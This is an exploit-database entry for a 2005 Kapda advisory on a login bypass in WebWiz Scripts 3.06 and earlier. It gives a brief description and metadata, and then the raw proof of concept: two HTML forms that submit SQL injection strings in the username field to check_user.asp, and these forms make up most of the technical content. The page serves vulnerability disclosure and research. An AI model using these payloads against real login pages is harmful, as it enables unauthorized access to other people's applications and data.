WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory

vendor:

WebWiz Scripts

by:

devil_box [at} kapda.ir

7,5

CVSS

HIGH

287

CWE

Product Name: WebWiz Scripts

Affected Version From: 3.06

Affected Version To: 3.06

Patch Exists: YES

Related CWE: N/A

CPE: a:webwiz:webwiz_scripts

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

WebWiz Scripts Login Bypass PoC – site news , journal , weekly poll – Kapda `s advisory

WebWiz Scripts versions 3.06 and prior are vulnerable to a login bypass vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the vulnerable application. This will allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Upgrade to the latest version of WebWiz Scripts.

Source

Exploit-DB raw data:

<!--
Vulnerable products :

webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions


Proof of Concepts :
-->

<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

# milw0rm.com [2005-12-30]